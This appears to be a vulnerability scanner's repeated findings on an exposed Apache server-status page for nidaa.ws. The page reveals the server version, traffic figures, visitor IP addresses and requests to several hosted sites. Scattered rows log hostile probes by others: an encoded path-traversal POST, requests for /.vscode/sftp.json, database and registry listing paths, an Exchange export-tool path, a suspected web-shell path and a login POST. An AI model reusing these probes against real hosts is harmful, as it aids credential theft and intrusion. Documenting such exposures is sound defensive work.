      0-955050/409/7776_
      40.629246854389690.0165.371371.25
      176.88.160.79http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/WhatsApp-Image-2021-11-24-at-8.
      
      0-955050/256/7872_
      40.55188058709820.030.791230.20
      2.90.165.186http/1.1albayan.edu.sa:443GET /imgweb/file43/%25D8%25AA%25D8%25B9%25D9%2584%25D9%258A%25D
      
      0-955050/338/7373_
      40.1317927205215360620.024.251030.56
      2.90.145.212http/1.1
      
      0-955050/358/7713_
      40.57153564350630.038.091194.33
      217.113.194.250http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1679&t=217.113.194.127&c=5 HT
      
      0-955050/383/7621_
      40.51402355061920.050.301286.50
      5.163.85.48http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-955050/312/7794_
      40.654917947003830.020.471293.20
      2.90.71.104http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%AC%D8%AF%D9%88%D9%84%20%D8%A7%D9%84%D8%B5%
      
      0-955050/276/7755_
      40.60112409055221150.065.391392.67
      176.88.160.79http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/1E3A0814-scaled.jpg HTTP/1.1
      
      1-960110/320/6962_
      41.85463378342760.047.501400.91
      51.36.240.154http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-960110/532/7564_
      41.90269070220290.020.571382.20
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      1-960110/326/7671_
      41.98177264504860.0118.671345.67
      2.90.134.174http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-960111/345/7563K
      42.1400102754510.922.89963.53
      172.70.251.39http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-960110/332/7067_
      41.96193565527990.073.831198.68
      217.113.194.250http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1573&t=217.113.194.157&c=5 HT
      
      1-960110/241/7411_
      41.97183260720640.011.981080.10
      2.90.134.174http/1.1albayan.edu.sa:443GET /web/images/title.jpg HTTP/1.1
      
      1-960110/311/7390_
      41.8644610892324860.0109.721246.12
      
      Found on 2024-06-04 09:28
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7d0dcbc4d

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 02-Jun-2024 17:37:15 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  10 days 13 hours 32 minutes 25 seconds
      Server load: 0.29 0.42 0.43
      Total accesses: 1466073 - Total Traffic: 209.9 GB - Total Duration: 1594521598
      CPU Usage: u537.52 s40.19 cu6374.14 cs1410.02 - .916% CPU load
      1.61 requests/sec - 241.1 kB/second - 150.1 kB/request - 1087.61 ms/request
      16 requests currently being processed, 0 workers gracefully restarting, 234 idle workers
      __________________K__________W_____________R______.W............
      ...........____KK_____________________________K__R___________WWW
      WWWWWWWWWWWWWWWWWWWWWW........................._________________
      ______K_______W_W________________________________K______________
      _____R__K__________K_____________________________________R_K____
      _____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8284830/56/7152_
      5.93227552917470.02.83919.93
      172.69.103.141http/1.1qr.brunch.ws:443GET /storage/food_image/17085205464112_img3b46483c816c4b6f958ec
      
      0-8284830/46/6151_
      6.021173925092310.08.24922.64
      172.69.103.145http/1.1qr.brunch.ws:443POST /foods/11 HTTP/1.1
      
      0-8284830/29/6378_
      5.94226832813410.09.71855.74
      172.69.103.147http/1.1qr.brunch.ws:443GET /storage/food_image/17096787609046_sweetmelon.webp HTTP/1.1
      
      0-8284830/24/6297_
      5.99154221363584280.01.13864.31
      5.82.77.221http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-8284830/46/6510_
      5.90228161519630.01.46946.15
      172.69.103.143http/1.1qr.brunch.ws:443GET /storage/food_image/17088551141700_img60db9211a02345f08b4a9
      
      0-8284830/30/6165_
      6.011288048637130.03.031062.34
      172.68.50.45http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      0-8284830/46/6366_
      5.95224548479660.04.40993.13
      172.69.103.146http/1.1qr.brunch.ws:443GET /storage/food_image/17162862769554_americano.jpg HTTP/1.1
      
      0-8284830/116/6467_
      5.71124146242440.03.201017.88
      46.251.129.255http/1.1
      
      0-8284830/47/7065_
      6.046482852136440.05.101067.63
      143.92.170.236http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D8%B1%D9%8A%D8%A7%D8%B6%
      
      0-8284830/48/6347_
      6.1448247495490.03.301017.54
      93.168.33.1http/1.1sulaimaniya.edu.sa:443GET /wp-content/plugins/blog-designer-pack/assets/images/ticker
      
      0-8284830/57/6414_
      6.19243239472030.06.56763.07
      93.168.33.1http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2022/05/%D8%AA%D8%AD%D8%AF%D9%8A%D8%AB-
      
      0-8284830/70/7049_
      6.095222346915780.05.20688.55
      93.168.33.1http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2016/02/sample-welcome.png HTTP/1.1
      
      0-8284830/143/6579_
      5.66124436948423740.033.531219.25
      144.86.4.228http/1.1
      
      0-8284830/84/6323_
      5.91227648431890.02.121081.97
      172.69.103.141http/1.1qr.brunch.ws:443GET /storage/food_image/17088499495311_img5d0fa3d62169406cac3fd
      
      0-8284830/27/6511_
      5.88228181298270.012.78797.57
      172.69.103.142http/1.1qr.brunch.ws:443GET /storage/food_image/17096783615789_beef.webp HTTP/1.1
      
      0-8284830/33/6279_
      5.96223330973390.04.78869.97
      172.69.103.139http/1.1qr.brunch.ws:443GET /storage/food_image/17162871303626_novawaterlarge.jpg HTTP/
      
      0-8284830/46/6341_
      6.0113127136106380.03.961023.75
      5.82.77.221http/1.1albayan.edu.sa:443GET /imgweb/1445/%EF%BF%BD%EF%BF%BD%D9%85%D8%B1%D8%A7%D8%AC%D8%
      
      0-8284830/41/6463_
      5.98193276578420.03.561040.24
      31.166.178.11http/1.1albayan.edu.sa:443GET /school/school/image_max/web/image_news/________1_11.png HT
      
      0-8284831/45/6548K
      6.2002419201366.83.601039.37
      172.70.250.243http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-8284830/111/6716_
      6.1444247199930.05.17942.16
      77.223.245.136http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-8284830/35/6279_
      5.981995205919810.02.67793.71
      172.69.103.145http/1.1qr.brunch.ws:443GET /assets/images/placeholder.png HTTP/1.1
      
      0-8284830/25/6455_
      5.922284949935180.02.101040.70
      66.249.64.131http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-8284830/34/6354_
      5.95224450022280.02.631117.05
      172.69.103.139http/1.1qr.brunch.ws:443GET /storage/food_image/17162865757146_avogatovanilla.jpg HTTP/
      
      0-8284830/30/6615_
      6.2013336141080.02.37993.23
      5.110.162.130http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-8284830/29/6566_
      5.93227241389480.01.641098.12
      172.69.103.141http/1.1qr.brunch.ws:443GET /storage/food_image/17088534426502_img42a4152548b44f0e8731d
      
      1-8290400/28/5737_
      4.20228269545090.00.831109.43
      172.69.103.139http/1.1qr.brunch.ws:443GET /storage/food_image/17088544068106_imge898a9bef8f942f99cf7c
      
      1-8290400/21/6106_
      4.4012810658306120.02.801080.84
      162.158.129.52http/1.1sibaqulhorof.com:443GET /api/v1/app/friends/requests HTTP/1.1
      
      1-8290400/150/6589_
      4.35187446011710.01.301071.09
      31.166.178.11http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-8290400/36/6404_
      4.26223588122200.06.05805.41
      172.69.103.138http/1.1qr.brunch.ws:443GET /storage/food_image/17088458847942_oip6.jpg HTTP/1.1
      
      1-8290400/23/5958W
      4.130056947080.03.60968.89
      162.158.86.72http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      1-8290400/19/6286_
      4.27223555660190.01.05880.69
      172.69.103.142http/1.1qr.brunch.ws:443GET /storage/vendor_settings/17085246857302_group6395.png HTTP/
      
      1-8290400/38/6228_
      4.37151272499200.03.251
      Found on 2024-06-02 14:37
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7b4320d8e

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 02-Jun-2024 14:41:44 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  10 days 10 hours 36 minutes 54 seconds
      Server load: 0.43 0.45 0.43
      Total accesses: 1440966 - Total Traffic: 206.1 GB - Total Duration: 1572612308
      CPU Usage: u537.54 s41.91 cu6266.6 cs1387.28 - .913% CPU load
      1.6 requests/sec - 239.6 kB/second - 150.0 kB/request - 1091.36 ms/request
      20 requests currently being processed, 0 workers gracefully restarting, 230 idle workers
      _______R_______K_____________________K___K_____________W________
      _____W_____________K__K___________________________K__________WWW
      WWWWWWWWWWWWWWWWWWWWWW___K__________K_____W___________W_K____K__
      ________..................................................______
      ________________C____K____________________K______________C_K____
      _____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8128400/180/7039_
      26.0323212552378610.019.97915.24
      172.69.103.143http/1.1sibaqulhorof.com:443POST /api/v1/app/question/get/single HTTP/1.1
      
      0-8128400/194/6065_
      26.1531124898600.021.45912.89
      142.93.143.8http/1.1akgsa.com:443GET /_all_dbs HTTP/1.1
      
      0-8128400/244/6314_
      25.94328529440720.051.24844.82
      188.114.102.53http/1.1qr.brunch.ws:443GET /storage/food_image/17088496289494_img9c899fb1a4f74e66accf8
      
      0-8128400/172/6243_
      26.002874363516980.031.38861.88
      66.249.70.164http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=1520 HTTP/1.1
      
      0-8128400/204/6422_
      26.1534261395050.06.17941.43
      142.93.143.8http/1.1akgsa.com:443GET / HTTP/1.1
      
      0-8128400/211/6072_
      25.95328548216740.09.171049.46
      188.114.102.244http/1.1qr.brunch.ws:443GET /storage/food_image/17096770987078_minibeefburger.webp HTTP
      
      0-8128400/160/6272_
      26.08200210947802420.099.94932.92
      51.252.178.123http/1.1albayan.edu.sa:443GET /imgweb/files41/%D8%A7%D9%84%D9%88%D8%AD%D8%AF%D8%A9%20%D8%
      
      0-8128400/266/6252R
      25.91330144328140.093.841011.45
      51.235.110.151http/1.1
      
      0-8128400/201/6928_
      26.0223891950091280.09.271053.69
      37.243.185.242http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-8128400/277/6250_
      25.93328547296870.013.131010.11
      188.114.102.194http/1.1qr.brunch.ws:443GET /storage/food_image/17088484233758_imgacf71be0991e4e4186ad5
      
      0-8128400/222/6322_
      25.963265239166220.020.22754.45
      188.114.102.220http/1.1qr.brunch.ws:443GET /storage/food_image/17096776507703_creembrulleh.webp HTTP/1
      
      0-8128400/138/6904_
      26.1113339246530050.012.23672.38
      151.255.9.164http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/1E3A0598-scaled.jpg HTTP/1.1
      
      0-8128400/177/6364_
      25.99321548192120.05.581182.55
      188.114.102.20http/1.1qr.brunch.ws:443GET /storage/food_image/17088460069724_oip7.jpg HTTP/1.1
      
      0-8128400/175/6170_
      26.08211247982440.049.001076.42
      151.255.9.164http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/WhatsApp-Image-2021-11-24-at-8.
      
      0-8128400/198/6441_
      25.98323581048670.08.36782.77
      188.114.102.150http/1.1qr.brunch.ws:443GET /storage/food_image/17162863763766_turkishcoffee.jpg HTTP/1
      
      0-8128403/177/6198K
      26.151030539743.112.61863.02
      5.82.33.133http/1.1albayan.edu.sa:80GET /e_sch/view_result.php?user=web&id_c=1 HTTP/1.1
      
      0-8128400/171/6225_
      25.91330135979350.023.201016.49
      188.114.102.30http/1.1qr.brunch.ws:443GET /storage/food_image/17088526154753_img417ac9265ec848f69f20f
      
      0-8128400/255/6348_
      25.98323574518450.058.851010.17
      188.114.102.134http/1.1qr.brunch.ws:443GET /storage/food_image/17162862769554_americano.jpg HTTP/1.1
      
      0-8128400/163/6459_
      25.9033241771660.068.431027.15
      142.93.143.8http/1.1
      
      0-8128400/236/6546_
      26.10201247093190.044.58933.54
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-8128400/210/6182_
      26.129471205649730.08.21788.65
      52.34.253.52http/1.13dvi.com:443GET / HTTP/1.1
      
      0-8128400/184/6368_
      26.1017163046170250.059.771035.03
      198.211.125.40http/1.1zed.sa:443POST /wp-login.php HTTP/1.1
      
      0-8128400/209/6252_
      26.06214249853990.09.131110.61
      2.90.168.171http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font1/DroidKufi-Bold.woff HTTP/1.1
      
      0-8128400/218/6525_
      26.138111635901010.0254.53985.51
      162.158.59.156http/1.1sibaqulhorof.com:443GET /api/v1/app/general/TopPlayers?type=1 HTTP/1.1
      
      0-8128400/172/6468_
      26.14597241224370.027.101093.68
      52.167.144.219http/1.1albayan.edu.sa:443GET /web/390.html2 HTTP/1.1
      
      1-8103360/22/5673_
      4.72898768241920.01.611102.35
      199.203.249.126http/1.1
      
      1-8103360/40/6030_
      5.0312237158192700.00.891074.93
      52.167.144.219http/1.1albayan.edu.sa:443GET /imgweb/file42/2220210406_11000067.jpg HTTP/1.1
      
      1-8103360/37/6364_
      4.882531745882720.02.311065.59
      66.249.70.164http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=146 HTTP/1.1
      
      1-8103360/24/6278_
      5.02133287957620.01.98796.61
      151.255.9.164http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/revslider/school-home/slide2-art6.png H
      
      1-8103360/27/5902_
      5.0632156264370.021.61962.49
      142.93.143.8http/1.1akgsa.com:443GET /v2/_catalog HTTP/1.1
      
      1-8103360/22/6191_
      5.0574144355567090.00.42875.06
      95.187.54.16http/1.1albayan.edu.sa:443GET /imgweb/qb39/5/mat25.pdf HTTP/1.1
      
      1-8103360/31/6147_
      4.88234172416110.04.771003.87
      5.41.17.105http/1.1albayan.edu.sa:443GET /web/images/folder.gif HTTP/1.1
      Found on 2024-06-02 11:41
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7a8e33c75

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 01-Jun-2024 12:32:19 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  9 days 8 hours 27 minutes 29 seconds
      Server load: 0.59 0.50 0.52
      Total accesses: 1255195 - Total Traffic: 179.6 GB - Total Duration: 1383884319
      CPU Usage: u632.62 s62.36 cu5328.13 cs1207.09 - .895% CPU load
      1.55 requests/sec - 233.1 kB/second - 150.1 kB/request - 1102.53 ms/request
      14 requests currently being processed, 0 workers gracefully restarting, 236 idle workers
      _______K____R__________________W________________R_______________
      ______K_____________K______________R___________K_____________WWW
      WWWWWWWWWWWWWWWWWWWWWWK_________________________________________
      _______K______________________K_____________________K___________
      ____________K_____R.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8134760/184/6205_
      26.7981247938030.048.54781.45
      172.71.115.36http/1.1qr.brunch.ws:443GET /storage/food_image/17095843802994_vieggomelt.webp HTTP/1.1
      
      0-8134760/200/5282_
      26.7582923293320.018.42787.80
      172.71.114.120http/1.1qr.brunch.ws:443GET /storage/category_image/17098160766698_10.png HTTP/1.1
      
      0-8134760/155/5574_
      26.7112510426446700.07.61708.74
      172.71.130.109http/1.1sibaqulhorof.com:443GET /api/v1/app/general/TopPlayers?type=1 HTTP/1.1
      
      0-8134760/175/5534_
      26.8866190361262560.021.28712.52
      54.36.148.2http/1.1trydaris.com:443GET /services/ HTTP/1.1
      
      0-8134760/230/5688_
      26.8936154465970.018.17816.78
      138.68.86.32http/1.1thenewjeddah.com:443GET /.DS_Store HTTP/1.1
      
      0-8134760/149/5350_
      26.8081246664220.071.44955.05
      172.71.114.64http/1.1qr.brunch.ws:443GET /storage/food_image/17088571791773_img22d8f50a73dd4253ba14a
      
      0-8134760/206/5491_
      26.8280541599390.084.62750.96
      172.71.114.146http/1.1qr.brunch.ws:443GET /storage/food_image/17088496289494_img9c899fb1a4f74e66accf8
      
      0-8134761/242/5439K
      26.890137847570.76.65890.00
      172.71.250.44http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      0-8134760/201/6139_
      26.8380744143440.044.23902.25
      172.71.114.165http/1.1qr.brunch.ws:443GET /storage/food_image/17096770987078_minibeefburger.webp HTTP
      
      0-8134760/186/5480_
      26.8180640083780.010.77925.50
      172.71.114.149http/1.1qr.brunch.ws:443GET /storage/food_image/17088494201379_img3d0559256f09407291a00
      
      0-8134760/270/5512_
      26.80813237443990.040.58710.84
      172.71.114.70http/1.1qr.brunch.ws:443GET /storage/food_image/17088519231693_img3622bfc18d474ecfbcfea
      
      0-8134760/258/6161_
      26.7681740014520.013.78573.26
      172.71.114.193http/1.1qr.brunch.ws:443GET /storage/category_image/17098164893955_4.png HTTP/1.1
      
      0-8134760/241/5627R
      26.7019310145787350.032.901087.57
      188.249.34.90http/1.1
      
      0-8134760/182/5505_
      26.8380646561840.010.36933.07
      172.71.114.12http/1.1qr.brunch.ws:443GET /storage/food_image/17088534735408_img74aa0275212f47449ea14
      
      0-8134760/159/5666_
      26.8679567624480.017.79746.02
      172.71.114.88http/1.1qr.brunch.ws:443GET /storage/vendor_settings/17085246857302_group6395.png HTTP/
      
      0-8134760/145/5511_
      26.8580227070280.033.24783.76
      172.71.114.60http/1.1qr.brunch.ws:443GET /storage/food_image/17162858332756_mojitococktail.jpg HTTP/
      
      0-8134760/225/5394_
      26.721243831530790.09.68869.58
      49.13.65.35http/1.13dvi.com:443POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32
      
      0-8134760/214/5562_
      26.8927270113600.064.33881.35
      128.199.182.55http/1.1php.we3dvi.com:80\x16\x03\x01\x01\x07\x01
      
      0-8134760/185/5735_
      26.39150229771990.011.87854.70
      82.167.212.180http/1.1
      
      0-8134760/230/5721_
      26.8480439723770.018.57724.63
      172.71.114.166http/1.1qr.brunch.ws:443GET /storage/food_image/17088536517355_imge12175a5596244dd9127e
      
      0-8134760/207/5378_
      26.65365203926610.07.40710.96
      138.68.86.32http/1.1
      
      0-8134760/146/5628_
      26.7981844317000.032.25794.55
      172.71.115.59http/1.1qr.brunch.ws:443GET /storage/food_image/17095847871371_eggbacon.jpg HTTP/1.1
      
      0-8134760/188/5525_
      26.8580637375590.010.09947.91
      172.71.115.41http/1.1qr.brunch.ws:443GET /storage/food_image/17096776507703_creembrulleh.webp HTTP/1
      
      0-8134760/227/5791_
      26.8836233608660.012.31702.54
      138.68.86.32http/1.1thenewjeddah.com:443GET / HTTP/1.1
      
      0-8134760/149/5706_
      26.8921132646170.047.42987.94
      128.199.182.55http/1.1customers.akg.sa:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-8113790/242/4921_
      27.4080461880990.036.72972.54
      172.71.114.57http/1.1qr.brunch.ws:443GET /storage/food_image/17162860567415_americancoffee.jpg HTTP/
      
      1-8113790/199/5291_
      27.271119553956170.017.72883.56
      172.71.126.101http/1.1sibaqulhorof.com:443GET /api/v1/app/general/maintenance_check HTTP/1.1
      
      1-8113790/260/5626_
      27.3581243663430.045.25896.87
      172.71.114.85http/1.1qr.brunch.ws:443GET /storage/food_image/17096783054077_trio.webp HTTP/1.1
      
      1-8113790/158/5534_
      27.27134037337050.032.54731.78
      54.36.149.1http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=630&t=54.36.148.90&c=5 HTTP/1
      
      1-8113790/151/5033_
      27.27156051932560.016.23874.20
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      1-8113790/221/5402_
      27.3980539115970.018.87761.87
      172.71.114.217http/1.1qr.brunch.ws:443GET /storage/food_image/17162860982324_cortado.jpg HTTP/1.1
      
      1-8113790/170/5325W
      27.270068863930.039.57930.44
      
      Found on 2024-06-01 09:32
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7d8cf53c1

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 01-Jun-2024 08:21:09 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  9 days 4 hours 16 minutes 19 seconds
      Server load: 0.31 0.39 0.40
      Total accesses: 1228340 - Total Traffic: 176.3 GB - Total Duration: 1366799337
      CPU Usage: u501.09 s40.83 cu5328.13 cs1207.09 - .892% CPU load
      1.55 requests/sec - 233.1 kB/second - 150.5 kB/request - 1112.72 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 241 idle workers
      __K____________________________________________________________K
      _________________K____________________________________W______WWW
      WWWWWWWWWWWWWWWWWWWWWW_______________K_________K________________
      ___________K___________________________________________K______K_
      ___________________.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8134760/74/6095_
      12.1582339042612240.04.72737.63
      114.119.150.158http/1.1daris.live:80GET /product/95 HTTP/1.1
      
      0-8134760/101/5183_
      12.09908322190440.05.39774.77
      78.95.60.151http/1.1jawad.com.sa:443GET /public/front_resources/js/jquery.star-rating-svg.min.js HT
      
      0-8134761/82/5501K
      12.270126247870.83.35704.48
      172.71.250.165http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-8134760/66/5425_
      12.24188108358392660.05.63696.88
      31.166.95.80http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      0-8134760/82/5540_
      12.11864354376130.012.72811.33
      40.77.167.78http/1.1albayan.edu.sa:443GET /e_sch/code/forum/ HTTP/1.1
      
      0-8134760/49/5250_
      12.19313045553480.057.91941.52
      54.36.149.99http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=802&t=54.36.148.149&c=5 HTTP/
      
      0-8134760/75/5360_
      12.27796339557960.069.28735.62
      64.225.75.246http/1.1trynidaa.com:443GET /_all_dbs HTTP/1.1
      
      0-8134760/102/5299_
      12.2616422837691440.03.73887.08
      66.249.77.37http/1.1akg.sa:443GET /?Dantean=31769161&MJ60Sw=1938895 HTTP/1.1
      
      0-8134760/89/6027_
      12.15790144017600.03.58861.60
      51.83.238.93http/1.1thenewjeddah.com:443GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1
      
      0-8134760/62/5356_
      12.16672239887610.02.60917.33
      87.236.176.98http/1.1sradmin.3dvi.com:80GET / HTTP/1.1
      
      0-8134760/125/5367_
      12.241893235429240.033.50703.76
